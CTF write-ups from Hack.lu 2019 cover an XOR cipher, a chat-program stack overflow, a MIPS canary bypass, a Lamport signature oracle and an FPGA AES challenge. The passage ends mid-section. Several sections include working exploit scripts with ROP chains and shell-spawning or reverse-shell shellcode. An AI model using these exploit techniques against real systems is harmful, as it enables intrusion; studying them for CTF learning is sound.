HACK.LU CTF 2019

Cobol OTP challenge

Description

To save the future you have to look at the past. Someone from the inside sent you an access code to a bank account with a lot of money. Can you handle the past and decrypt the code to save the future?

Setup

The challenges include two files otp.cob and out

otp.cob is a Cobol program that at a glance, encrypts a message by xoring an unknown key (50 bytes) with a message (50 bytes as well)

out looks like an encrypted message:

$ hexdump -C out

00000000 45 6e 74 65 72 20 79 6f 75 72 20 6d 65 73 73 61 |Enter your messa|
00000010 67 65 20 74 6f 20 65 6e 63 72 79 70 74 3a 0a a6 |ge to encrypt:..|
00000020 d2 13 96 79 3b 10 64 68 75 9f dd 46 9f 5d 17 55 |...y;.dhu..F.].U|
00000030 6a 68 43 8f 8c 2d 92 31 07 54 60 68 26 9f cd 46 |jhC..-.1.T`h&..F|
00000040 87 31 2a 54 7b 04 5f a6 eb 06 a4 70 30 11 32 4a |.1*T{._....p0.2J|
00000050 0a                                              |.|

Issue 1

Taking a look at the heart of the encryption:

call 'CBL_XOR' using ws-key(ws-ctr:1) ws-flag by value ws-xor-len end-call

Reading the documentation https://documentation.microfocus.com/help/index.jsp?topic=%2FGUID-0E0191D8-C39A-44D1-BA4C-D67107BAF784%2FHRCLRHCALL5H.html we discover that this performs a
xor between ws-key[ws-ctr] and ws-flag with the length of ws-xor-len bytes. The result is stored in ws-flag.

Looking at the types we’ve understood that ws-ctr and ws-xor-len are one decimal digit long only. Therefore ws-ctr will wrap around every 10 bytes.

Thus, this limits the valid key space, since the xor of the key with the encrypted data must yield a printable character. In this case, we see that

encrypted[1]  ^ key[1] = printable_char1
encrypted[11] ^ key[1] = printable_char2
encrypted[21] ^ key[1] = printable_char3
encrypted[31] ^ key[1] = printable_char4
encrypted[41] ^ key[1] = printable_char5

And, of course, this holds for the key[2], etc..

Issue 2

Remembering that Cobol arrays are 1 based, the value of ws-flag(ws_ctr:1) when ws_ctr is 0 yields nothing and the xor is effectively nullified, and this gives us 5 unencrypted chars for free:

<code>*********u*********C*********&*********_*********\n</code>

Since we had ~40 options for every character and still have 9 key character to guess we start by assuming the message looks like “flag{***************}\n“, where the * mean unknown character.

Pluging in the right key chars to yield the above string we get:

<code>flag{***_u_c4n_***_CO2_c3***_&_s4v3***3_fUtUr***}\n</code>

Now we could try to read the message and guess the needed keys. By assuming the word save (s4v3) should have _ after it and future is a reasonable word we tried all the options to get meaningful phrases from:

<code>flag{N**_u_c4n_b**_CO2_c3r**_&_s4v3_**3_fUtUrE**}\n</code>

With a little guess work we think it reads something along the lines of: Now you can buy CO2 cer** & save the future**

Pluging in our guesses gave us the full flag:

<code>flag{N0w_u_c4n_buy_CO2_c3rts_&_s4v3_th3_fUtUrE1!}</code>

Chat

Hacklu CTF 2019

Category:pwn – Difficulty: easy – points: 381 – solves: 16

To coordinate our efforts for a better future we started to build a chat program. While it doesn’t have much functionality, yet, maybe you could have a look at it already to see if you can find any serious vulnerabilities. You know, better save than sorry!

Download challenge files

nc chat.forfuture.fluxfingers.net 1337

We are faced with an elf executable. Looks like a simple chat program.
It lets you create Chat channels, join and pause channels.

Command Commands:
    /nc - New Chat Channel - Create and join a new Chat Channel.
    /jc x   - Join Chat Channel - Join the Chat Channel number x.
    /lc - List Chat Channels - Lists the Chat Channels.
    /q  - Quit - Quit this awesome chat program.
    /h  - Help - Print this help message.

Inside a channel you have the following commands:

Chat Commands:
    /e  - Echo - The first line following this command specifies the number of characters to echo.
    /pc - Pause Chat Channel - Return to Command Channel. The Chat Channel stays open.
    /qc - Quit Chat Channel - Return to Command Channel. The Chat Channel is terminated.
    /h  - Help - Print this help message.
That's all for now :/

The echo command looks promising:

if ( strlen(command) != 3 || command[0] != '/' || command[1] != 'e' )
            break;
          v15 = 32;
          if ( !fgets(command) )
            v14 = printf("Chat Command Error: Reading Echo Size\n");
          size = atoi(command);
          size_plus_1 = size + 1;
          stack_addr = (int *)((char *)&v4 - ((size + 16) & 0xFFFFFFF0));
          if ( !fgets((char *)&v4 - ((size + 16) & 0xFFFFFFF0)) )
          {
            active[v23] = 2;
            return 0;
          }
          v13 = 1;
          v12 = stack_addr;
          v2 = strlen(stack_addr);
          v11 = write(1, v12, v2);
          v10 = 1;
          v9 = write(1, "\n", 1);

There is no validation of the size when using fgets to write to a stack location.
Our first impulse was to try and pass a negative number as size – and in this way to overwrite our own stack frame and our return-address. This didn’t work since the fgets validates size > 0.
We then tried to think of what we can overwrite if we can write to addresses lower than our stack.
Looking at vmmap after /nc command:

gef➀  vmmap
Start      End        Offset     Perm Path
0x08048000 0x08049000 0x00000000 r-- /.../chat
0x08049000 0x080c2000 0x00001000 r-x /.../chat
0x080c2000 0x080f3000 0x0007a000 r-- /.../chat
0x080f4000 0x080f8000 0x000ab000 rw- /.../chat
0x080f8000 0x0811d000 0x00000000 rw- [heap]
0xf7fbc000 0xf7fbd000 0x00000000 ---    
0xf7fbd000 0xf7ff9000 0x00000000 rw-    <--- CHANNEL 1 STACK (size 0x3c000)
0xf7ff9000 0xf7ffc000 0x00000000 r-- [vvar]
0xf7ffc000 0xf7ffe000 0x00000000 r-x [vdso]
0xfffdd000 0xffffe000 0x00000000 rw- [stack]

After leaving the channel (/pc) and creating a new one (/nc) we see:

gef➀  vmmap
Start      End        Offset     Perm Path
0x08048000 0x08049000 0x00000000 r-- /.../chat
0x08049000 0x080c2000 0x00001000 r-x /.../chat
0x080c2000 0x080f3000 0x0007a000 r-- /.../chat
0x080f4000 0x080f8000 0x000ab000 rw- /.../chat
0x080f8000 0x0811d000 0x00000000 rw- [heap]
0xf7f7f000 0xf7f80000 0x00000000 --- 
0xf7f80000 0xf7fbc000 0x00000000 rw- <-- CHANNEL 2 STACK
0xf7fbc000 0xf7fbd000 0x00000000 --- 
0xf7fbd000 0xf7ff9000 0x00000000 rw- <-- CHANNEL 1 STACK
0xf7ff9000 0xf7ffc000 0x00000000 r-- [vvar]
0xf7ffc000 0xf7ffe000 0x00000000 r-x [vdso]
0xfffdd000 0xffffe000 0x00000000 rw- [stack]

So by using the echo command from channel 1 we can overwrite the stack of channel 2. This seems promising πŸ™‚

After a little experimentation with the sizes we got this:

gef➀  run < input.txt 
Starting program: /.../chat < input.txt
Command Channel:
[New LWP 31829]
> Chat Channel 1:
> Command Channel:
[New LWP 31830]
> Chat Channel 2:
> Command Channel:
> Joining Chat Channel.
Chat Channel 1:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj

[LWP 31829 exited]

Thread 3 "chat" received signal SIGSEGV, Segmentation fault.
[Switching to LWP 31830]
──────────────────────────────────────────────[ registers ]────
$eax   : 0x000000f0
$ebx   : 0x080f63a4  β†’  0x00000000
$ecx   : 0x00000080
$edx   : 0x62616165 ("eaab"?)
$esp   : 0xf7fbb0fc  β†’  0x0807a883  β†’  <__libc_disable_asynccancel+115> cmp eax, 0xfffff000
$ebp   : 0x000000f0
$esi   : 0x00000000
$edi   : 0x080f5f74  β†’  0x00000000
$eip   : 0x61616161 ("aaaa"?)
$cs    : 0x00000023
$ss    : 0x0000002b
$ds    : 0x0000002b
$es    : 0x0000002b
$fs    : 0x00000000
$gs    : 0x00000063
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
──────────────────────────────────────────────────[ stack ]────
0xf7fbb0fcβ”‚+0x00: 0x0807a883  β†’  <__libc_disable_asynccancel+115> cmp eax, 0xfffff000    ← $esp
0xf7fbb100β”‚+0x04: 0x00000000
0xf7fbb104β”‚+0x08: 0x00000000
0xf7fbb108β”‚+0x0c: 0x080f7384  β†’  "247392"
0xf7fbb10cβ”‚+0x10: 0xf7fbb198  β†’  0x00000007
0xf7fbb110β”‚+0x14: 0x00000000
0xf7fbb114β”‚+0x18: 0xf7fbbb40  β†’  0x080f7384  β†’  "247392"
0xf7fbb118β”‚+0x1c: 0xf7fbb1a8  β†’  0xf7fbb218  β†’  0xf7fbb2e8  β†’  0x00000000
──────────────────────────────────────────────[ code:i386 ]────
[!] Cannot disassemble from $PC
────────────────────────────────────────────────[ threads ]────
[#0] Id 3, Name: "chat", stopped, reason: SIGSEGV
[#1] Id 1, Name: "chat", stopped, reason: SIGSEGV
──────────────────────────────────────────────────[ trace ]────
───────────────────────────────────────────────────────────────
0x61616161 in ?? ()

Now that we have control of eip – we need to see how to ROP to gain execution of our own shellcode.
We are overwriting the return address on the stack of the function
__kernel_vsyscall.

We can use some bytes in the command buffer (32 total size) and gadgets from the code segment.
We chose to use a reverse shell shellcode.

We ended up doing something a little complicated:
We wrote a ROP chain to do allocate with mmap a 0x1000 byte area with rwx protection at a fixed address (0xf0000000)
We then used memset to write our shellcode to that area.
During the process we noticed that it didn’t work – since we had 0xa in our stack – and fgets will stop reading at newline.
To overcome this, we used memcpy to copy the first 23 bytes from the command buffer and the rest using memset.

This worked πŸ˜‰

'''<br>
import struct<br>
print("/nc")<br>
print("/pc")<br>
print("/nc")<br>
print("/pc")<br>
print("/jc 1")<br>
print("/e")<br>
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc7\xb0\x66\x5b\x68\x00\x00\x00\x00\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\x43\xcd\x80\x87\xdf\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x89\xE2\x53\x89\xE1\xB0\x0B\xCD\x80"<br>
print("250000 " + shellcode[:23])<br>
MEMSET="\xb0\x6b\x07\x08"<br>
ADD_ESP_58="\xae\xa6\x04\x08"<br>
ADD_ESP_18="\x88\xab\x04\x08"<br>
MEMCPY="\x90\x6a\x07\x08"<br>
MMAP = "\x40\x94\x07\x08"<br>
s = "aaaabaaacaaa" + MMAP + ADD_ESP_18 + struct.pack("<IIIIIII", 0xf0000000,<br>
        0x1000, 7, 0x20032, 0xffffffff, 0, 0)<br>
shellcode = shellcode[23:]<br>
s += MEMCPY + ADD_ESP_58 + struct.pack("<IIIIIII", 0xf0000000, 0x80f7384 + 7, 23, 0, 0, 0, 0) + "\x00" * 0x40<br>
for i,b in enumerate(shellcode):<br>
    s += MEMSET + ADD_ESP_18 + struct.pack("<IIIIIII", 0xf0000000 + i + 23, ord(b), 1, 0, 0, 0, 0)
s += "\x00\x00\x00\xf0"<br>
print(s)<br>
'''

The flag was: flag{thread_chat_with_alloca}

no risc no future

The challenge:

We use microcontrollers to automate and conserve energy. IoT and stuff. Most of them don't use CISC architectures.

In this challenge we are given 4 files. README.md and it’s pretty self-explanatory. The actual challenge file is no_risc_no_future and the readme specifies we should run it using qemu-mipsel-static. This tells us that the challenge is designed for the MIPS architecture (which is a RISC architecture, unlike CISC).

For this challenge, we chose to use Ghidra, since it has a built-in decompiler for MIPS, which eases our understanding of the exercise.

The code is very simple to read, and this is a textbook stack overflow exercise:

undefined4 main(void)

{
  int read_count;
  undefined buf [64];
  int cookie;

  cookie = __stack_chk_guard;
  read_count = 0;
  while (read_count < 10) {
    read(0,buf,0x100);
    puts(buf);
    read_count = read_count + 1;
  }
  if (cookie != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

In short:

  • The code reads 0x100 bytes into a 0x40 byte-long buffer (Overflow…).
  • The code prints whatever string is pointed at “buf” (Infoleak…).
  • The code does the following 10 times.

It’s also very clear that we have a stack cookie in place, designed to protect against stack overflows.

Studying the following, it’s very apparent that our challenge here is somehow bypassing the cookie protection mechanism, and then take-over the PC saved in the stack.

We are also provided with the following lines in README.md, which let us debug the binary:

./qemu-mipsel-static -g 1234 no_risc_no_future
gdb-multiarch -ex "break main" -ex "target remote localhost:1234" -ex "continue" ./no_risc_no_future

(Note: my gdb crashed while using gef, but peda seemed to work fine)

Last important point – the code iterates 10 times before finishing, which gives us multiple attempts to exploit the buffer overflow issue. As we’ll soon see – we need a few attempts to properly exploit the binary.

Leaking the cookie

In order to bypass the cookie protection, let’s see where it’s located and what it looks like. This is a dump from gdb, while breaking on read:

gdb-peda$ x/100wx $sp
0x7fffe348:     0x004072a0      0x0049075c      0x00498300      0x0049074c
0x7fffe358:     0x00498300      0x0048c8fc      0x00400e60      0x00000000
0x7fffe368:     0x00400e60      0x00000000      0x00000000      0x00400634
0x7fffe378:     0x00498300      0x7fffe4a4      0x7fffe6e9      0x004002d4
0x7fffe388:     0x00498300      0x0041fb68      0x00000004      0x41414141
0x7fffe398:     0x41414141      0x41414141      0x41414141      0x41414141
0x7fffe3a8:     0x41414141      0x41414141      0x6164730a      0x00420a66
0x7fffe3b8:     0x00498300      0x00000000      0x00000000      0x00400e60
0x7fffe3c8:     0x00000000      0x00000000      0x00000000      0xf7c27700
0x7fffe3d8:     0x00000000      0x004008e8      0x00000000      0x00000000

We can clearly see some AAAA‘s that I delivered as input. The cookie is located exactly 0x40 bytes after the buf start (0x0x7fffe394). Cookie @ 0x7fffe3d4 = 0xf7c27700.

As we can see, the first byte of the cookie is a null byte. This is true for every run of the program (you can check it out yourself). So we know one byte, and left with 3 more. What we can do is overflow 1 byte into the cookie (write 0x41 times some printable character), and then puts will print these bytes, along with the 3 cookie bytes which aren’t null. This way we get an info-leak for the cookie, and can deduce the full cookie from the text that’s printed.

Shellcode

At this point, we wanted to see if we can run code easily from the stack. We copied some MIPS shellcode we found to run bash, put it on the stack, and overwrote the buffer, with the correct cookie, and then PC. Turns out it works! Phew, no need to ROP or anything. BUT, when trying the same thing on the real server, it didn’t work. After thinking a bit, it seems like the stack isn’t always located in the same place, so we need to leak it.

Leaking the stack

Reading the code, and looking at the gdb memory dump, it seems that buf is uninitialized, and is filled with previous “garbage” data. One of the things that are present in the buffer is a stack address.

gdb-peda$ x/100wx $sp
0x7fffe348:     0x004072a0      0x0049075c      0x00498300      0x0049074c
0x7fffe358:     0x00498300      0x0048c8fc      0x00400e60      0x00000000
0x7fffe368:     0x00400e60      0x00000000      0x00000000      0x00400634
0x7fffe378:     0x00498300      0x7fffe4a4      0x7fffe6e9      0x004002d4
0x7fffe388:     0x00498300      0x0041fb68      0x00000001      0x41414141
0x7fffe398:     0x42424242      0x0049070a      0x00000000      0x00400ef4
0x7fffe3a8:     0x00000000      0x00000001      0x7fffe4a4      0x004218c4
0x7fffe3b8:     0x00498300      0x00000000      0x00000000      0x00400e60
0x7fffe3c8:     0x00000000      0x00000000      0x00000000      0x4acc2700
0x7fffe3d8:     0x00000000      0x004008e8      0x00000000      0x00000000

This is another memory dump, showing the buffer “AAAABBBB” as read from the user, and some “leftovers” inside buf. We can clearly see that one of the addresses left inside buf is a stack address – 0x7fffe4a4 @ 0x7fffe3b0. And just in the same manner that we leaked the cookie – we can leak the stack address. Write 0x1c bytes up to the stack address, which will yield in puts printing it along with our data.

This address turns out to always be relative to where our buffer begins (0x7fffe394). These addresses are 0x110 bytes apart. So we know where our shellcode is located, and what value to set PC to.

Summary

To sum everything up – we have 3 important iterations:

  1. Leak stack address.
  2. Leak cookie value
  3. Write shellcode and overwrite PC to point to our shellcode (last iteration)

And that’s a wrap folks. It was a nice, easy challenge.

flag sha1sum: 1afc8fcd93dcee46d7578cb8307580632eb6e545

Code

import time
import socket
import struct
import hexdump
import binascii

#HOST = '127.0.0.1'
#PORT = 1337

HOST = "noriscnofuture.forfuture.fluxfingers.net"
PORT = 1338

def recv_data(s, do_hexdump=False):
    data = s.recv(1024)
    if do_hexdump:
        hexdump.hexdump(data)
    return data

def leak_canary(s):
    leak_canary_msg = "A" * 0x41
    s.send(leak_canary_msg)
    data = recv_data(s)
    canary = b"\x00" + data[0x41:0x44]
    print("canary is: ", binascii.hexlify(canary))
    return canary

def leak_stack(s):
    leak_stack_msg = "A" * 0x1c
    s.send(leak_stack_msg)
    data = recv_data(s)
    stack_addr = data[0x1c:0x20]
    stack_addr = struct.unpack("<I", stack_addr)[0]
    print("stack_addr is: ", hex(stack_addr))
    return stack_addr

def send_stub(s):
    stub_msg = "A" * 0x10
    s.send(stub_msg)
    data = recv_data(s)
    print("sent stub")

def override_pc(s, canary, pc):
    shellcode = b"\x50\x73\x06\x24\xff\xff\xd0\x04\x50\x73\x0f\x24\xff\xff\x06\x28\xe0\xff\xbd\x27\xd7\xff\x0f\x24\x27\x78\xe0\x01\x21\x20\xef\x03\xe8\xff\xa4\xaf\xec\xff\xa0\xaf\xe8\xff\xa5\x23\xab\x0f\x02\x24\x0c\x01\x01\x01/bin/sh\x00BBBB"
    assert len(shellcode) == 0x40
    final_msg = shellcode + canary + (b"\x00"*4) + pc
    print("len: ", hex(len(final_msg)))
    assert len(final_msg) == 0x4c
    s.send(final_msg)    
    data = recv_data(s)
    print ("fix cookie, overwrite pc")


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

stack_leak_addr = leak_stack(s)
stack_start_addr = stack_leak_addr-0x110

canary = leak_canary(s)
pc = struct.pack("<I", stack_start_addr)

for i in range(7):
    send_stub(s)

override_pc(s, canary, pc)

time.sleep(2)

s.send("cat flag\n")
recv_data(s, do_hexdump=True)
s.send("cat flag\n")
recv_data(s, do_hexdump=True)

Lamport Verify

The challenge:

I finally managed to create a signature verification service powered by time, artificial intelligence, the power of music and the randomness of entanglement (well, Leslie and the Emperor Penguin's randomness also helped). It is resistent to all known and unknown attacks and will always be uncrackable. Leave and believe!

Okay, that doesn’t reveal too much.. The challenge contains one file – verify and that’s it.

Reversing verify

After dedicating some time for reversing the binary, we can describe in general what it’s doing:

  1. Read 0x20 bytes from a file named flag.
  2. Read 0x4000 files from a file named secret_key.
  3. Get 0x20 utf-8 characters from user (@ 0x4011A0). We’ll call it user_input.
  4. Verify if the user_input == flag (Time-safe memcmp) (function @ 0x401290).
  5. If verbose (-v) flag is on – print “the signature” (function @ 0x401290).

Locally, we can control the secret_key file, flag file, and user_input. Remotely, we can only control the user_input, and it seems that the verbose option is always on.

Controlling the flag

Looking further into the signature calculation, it seems that the signature is calculated somehow by the flag and secret_key, and it’s our only observable clue about the flag from the server. Our input has no effect whatsoever on the flag calculation.

This begs the question – how can our input change anything? Luckily – it can. The function that grabs utf-8 input from the user has a buffer overflow, which allows us to write bytes past the end of the buffer allocated for input. (Meaning, we can actually write more than 32 BYTES, but seemingly no more than 32 CHARACTERS).

The structure in memory where the buffers are allocated looks like this:

struct glob
{
  char key[16384];
  char flag[32];
  char user_input[32];
  unsigned __int64 ptr_flag;
  unsigned __int64 ptr_user_input;
  unsigned __int64 ptr_key;
  unsigned __int64 verbose;
};

Since we can overflow bytes after the user input, we can controll the ptr_flag field, which is then being used to calculate the signature. If we point ptr_flag to user_input (thanks to no ASLR), we can start controlling the signature calculation, and observe changes in the signature, per our input.

Understanding the signature

After some hand-waving, white-boarding, arguments, trials and failures, we reached the following conclusion – The first 16 lines of the signature (32 bytes * 16) are affected by the first two bytes of the flag. Again, this took some time, trial and error, and simulation using our local binary, and mock test_key and flag files.

The best experiment was using a test_key where each row (32 bytes) has the value of the index of the row. It then really stands out which rows are picked per which combination of bytes.

Extracting the flag

Since we now have an understanding of the signature, and a way to control it, we can do the following:

  1. Send and input which will contain the following: “XX” + stub + (overwrite bytes – ptr_flag points to our input) – where XX are two characters from string.printable.
  2. Observe the first 16 lines of output, and save a dictionary where d[sha1sum(output)] = “XX”. This creates a mapping between each possible characters combination and the output signature it yields.
  3. We do this for each characters combination. It takes a little bit of time to get all the possible outputs from the server.
  4. We now send an input in the following manner: stub + (overwrite bytes ptr_flag points to original flag + index).
  5. The output we receive is affected by the original flag, and since we have every possible output mapped, we can reverse-search the matching characters by using the dictionary – c1c2 = d[sha1sum(new_output)].
  6. We continue this process, but instead of setting ptr_flag to the original flag, we offset the point by 2, to read the next 2 bytes, and repeat the process until we’re done.

…And that’s it! πŸ™‚

As a sidenote / tip:

There’s actually a faster way to do steps 1-3 if you run this “mapping” locally. You first have to grab the first 32 blocks of the original signature. In order to do that, you need to test which bytes yield which rows of the signature (using a local test_key which you know), and then map which rows come out. Send these rows to the server, until you complete the whole 32 byte * 32 rows, and you get your own test_key which matches the server (at least the first, relevant part).

flag sha1sum: 55b09c6c68e3a11ddd776f1e5c96bb800579ff14

Code

import socket
import string
import hashlib
import binascii

mapping = {}

str_list = string.ascii_letters + string.punctuation + string.digits

for char_check1 in str_list:
    for char_check2 in str_list:
        check_pattern = char_check1 + char_check2 + "\x5a"*29 + "\xf0\x90\x80\x40"

        print(char_check1 + char_check2)

        HOST = "lamport.forfuture.fluxfingers.net"
        PORT = 1337

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))

        s.send(check_pattern)
        data = ""
        while len(data) < 1100:
            data += s.recv(1100-len(data))

        k = hashlib.sha1(data).digest()
        if k in mapping.keys():
            raise
        mapping[k] = char_check1 + char_check2
        s.close()

print("Got all mappings")
print(mapping)

flag = ""
for idx in range(16):
    check_pattern = "\x5a"*31 + "\xf0" + chr(0x70+idx*2) + "\x80\x40"

    print(binascii.hexlify(check_pattern))
    HOST = "lamport.forfuture.fluxfingers.net"
    PORT = 1337

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))

    s.send(check_pattern)
    data = ""
    while len(data) < 1100:
        data += s.recv(1100-len(data))

    flag += mapping[hashlib.sha1(data).digest()]
    print(binascii.hexlify(flag))
    s.close()

print(flag)

AES manipulated

The challenge:

Another dimension, the year is 31337. All software has been eliminated and replaced by far superior, configurable hardware. The experiments started in 2019 when the FFF, the Fraternity for FPGA, published an AES implementation. To show the superiority of their design, individuals would receive the greatest honors if they would be able to recover the key although the FFF deemed this to be an impossible challenge.

In this exercise, we are given 2 files – tb.v and aes.vhd. A quick glance at the files as well as the files’ suffix indicate that these are related to Verilog – a language which enables us to write modules to an FPGA.

This exercise becomes significantly easier if one has previous knowledge about Verilog, or Xilinx development environment. This might have a been a problem for some groups, as some tools are necessary (GBs of Vivado installation) to solve this. It might be possible to solve with other methods or tools (we’ll discuss how at the end), but HW development knowledge can obviously help.

Understanding the Challenge

Our first clues are the filenames –

  • tb.v stands for testbench – a common practice in HW development. This is a file that tests a certain HW module by providing it input signals, and testing what output comes out.
  • aes.vhd – As our challenge suggests – the exercise is about AES, and this file represents the implementation of the AES module.

Let’s dig a little deeper…

AES module

As specified, The AES module is present in aes.vhd file. The first section is a comment which gives us some clues. Mostly – this is an AES module, which was compiled for Xilinx boards. “...This VHDL netlist...” – This means this is a compiled version of the Verilog module. We don’t see the code represented as different modules and registers and wires with meaningful names – the Verilog code was compiled to Muxes, Look-Up tables, Flip-Flops etc. Just like C code is compiled into Assembly, Verilog is compiled into HW components.

The module has the following interface, which is pretty self-explanatory:

entity AES128 is
  port (
    CLK : in STD_LOGIC := 'X'; 
    RESET : in STD_LOGIC := 'X'; 
    ENABLE : in STD_LOGIC := 'X'; 
    DONE : out STD_LOGIC; 
    PLAINTEXT : in STD_LOGIC_VECTOR ( 127 downto 0 ); 
    CIPHERTEXT : out STD_LOGIC_VECTOR ( 127 downto 0 ) 
  );
end AES128;
  • CLK – Input signal, specifies clock, which is needed for the module to operate. Probably a Rising/Falling edge.
  • RESET – Input signal. When on, the state is being reset, and nothing happens.
  • ENABLE – Input signal. When on (and reset off), starts the encryption process, and after a certain amount of clock cycles – we should get the output
  • DONE – Output signal. A bit specifying when the encrytion operation is done, and we can start reading the data.
  • PLAINTEXT – 127 Input signals (16 byte). Specifies the plaintext to encrypt.
  • CIPHERTEXT – 127 Input signals (16 byte). Holds the ciphertext once the encryption operation is done.

The thing that is immediately apparent is that the module has no “key” or “iv” inputs. Meaning, it’s supposed to act as a black-box – insert a plaintext, and receive a ciphertext – without specifying the key. This means that the key is a secret, somehow fused into this module, and our guess is that we need to find what it is (as suggested by the exercise’s description).

All the rest of the file describes the internal logic of the module. As said, the module is made up of look-up tables, flip-flops, wires, and muxes. These are used to make up the actual AES encryption logic. Since the code is compiled, we don’t see any “pretty” S-box routines, and byte rotations, but just a lot of binary “a is mapped to b” and “if inputs 1 2 3 are 1, then output is 1”. It’s pretty hard to deduce what the code does this way, and the key somehow got “fused” into the logic. As we’ll soon see, surprisingly, parsing this logic (even though we partially tried) is irrelevant.

Testbench

The testbench file is supposed to operate the AES module in a simulated environment. This means it’s not supposed to run on actual HW, but rather in a simulator that knows how to mimic all the internal signals, wires and registers. Again, this is a common procedure when working with Vivado, or HW development.

Let’s break the code down to understand what happens.

First, we create test registers, and zero them:

module test;
  reg RESET = 0;
  reg ENABLE = 0;
  reg [127:0] PLAINTEXT = 0;

These are the test-bench registers. Later on, the code will wire them to the actual module in order to instrument it.

Then, the test-bench is doing actions at certain points in time. In order to check how the module operates, we need to simulate a clock signal, provide input, and trigger the module to work. After a certain amount of time, we want to see the module’s output.

Now that we understand that – let’s go over the code.
The test-bench sets the RESET register to 1 after 100ns – to make sure everything is being initialized properly. Then, after additional 100ns the ENABLE register is being reset to 0.
After additional 200ns we stop holding the RESET signal at 1, and set it to 0, and 200ns after that we set the ENABLE register to 1. This is the point in time where the module actually starts to operate.

  initial begin
     # 100 RESET = 1;
     # 100 ENABLE = 0;


     # 200 RESET = 0;
     # 200 ENABLE = 1;

     # 3000 $stop;
  end

3000ns after the ENABLE register was set, we stop the simulation. This should be more than enough time to let the module work.

The next piece of code defines a CLK register, and in order to create a CLK signal for the AES module, it negates the register’s value every 10ns.

    reg CLK = 0;
    initial CLK = 0; 
  always #10 CLK = ~CLK; 

This creates a “square wave” pattern:

0 1 0 1 0 1  ...
  _   _   _
_| |_| |_| | ...

Usually, every rising edge (0->1) is used to signal a “pulse”, and this is indeed the case in the AES module.

Next, the code defines a CIPHERTEXT register, which is made up of 127 bits, and DONE register.

Then, the code simply wires the test-bench registers which we’ve just defined, into the AES module registers. Think of it just like connecting wires.

  wire [127:0] CIPHERTEXT;
  wire  DONE;

  AES128 aes128_inst (
    .CLK (CLK),
    .RESET (RESET),
    .ENABLE (ENABLE),
    .DONE (DONE),
    .PLAINTEXT_0 (PLAINTEXT[0]),
    ...
    .CIPHERTEXT_0 (CIPHERTEXT[0]),
    ...

The code monitors the CIPHERTEXT value, but we don’t care for it so much at this point.

  initial
     $monitor("At time %t, value = %h (%0d)",
              $time, CIPHERTEXT, CIPHERTEXT);
endmodule // test

Running the simulation

During the challenge, we spent a fair amount of time trying to understand if any alternative to Xilinx development environment can be found. Perhaps even quickly write a simulation engine ourselves. Downloading Vivado takes a lot of time, and requires a license. Luckily, one of the guys in our team had Vivado already installed, so this sped things up a bit. The alternatives of grabbing a copy somehow or writing a simulator seemed to take a lot of time, and I hope none of the groups failed because some had access to tools that other groups didn’t – a point for thought.

I know that some open-source enviornments do exist, but couldn’t find one that clearly indicated how to process these files, in the limited time-frame of the challenge. If you know otherwise – we’d be happy to know!

Going back to Vivado, it’s relatively easy to run the test-bench (again, previous knowledge is useful here) – Create a new project, add the aes.vhd module, and add the tb.v under the simulation dir tree. Press “Run simulation”, some voodoo will happen, and eventually the simulation will run and we can visually see all the signals, specifically the CIPHERTEXT.

The solution

The solution turns out to be quite simple, a lot simpler than the list of things we initially tried. These include:

  • Clock glitching
  • RESET/ENABLE glitching
  • Deducing the AES key by trying to figure out the 10th round key (which yields the key itself). This included trying to parse some binary Look-Up tables.
  • etc.

The reason I’m writing this is because this was an interesting learning experience, and the easiest solution is sometimes the best.

Eventually, we wanted to gain slightly more insight into the inner workings of the module, to check our sanity. If you look at the aes.vhd file, you will notice the following lines:

  signal signal_1367 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1368 : STD_LOGIC_VECTOR ( 3 downto 0 ); 
  signal signal_1369 : STD_LOGIC_VECTOR ( 3 downto 0 ); 
  signal signal_1370 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1371 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1372 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1373 : STD_LOGIC_VECTOR ( 127 downto 0 ); 
  signal signal_1374 : STD_LOGIC_VECTOR ( 31 downto 0 ); 
  signal signal_1375 : STD_LOGIC_VECTOR ( 127 downto 0 ); 

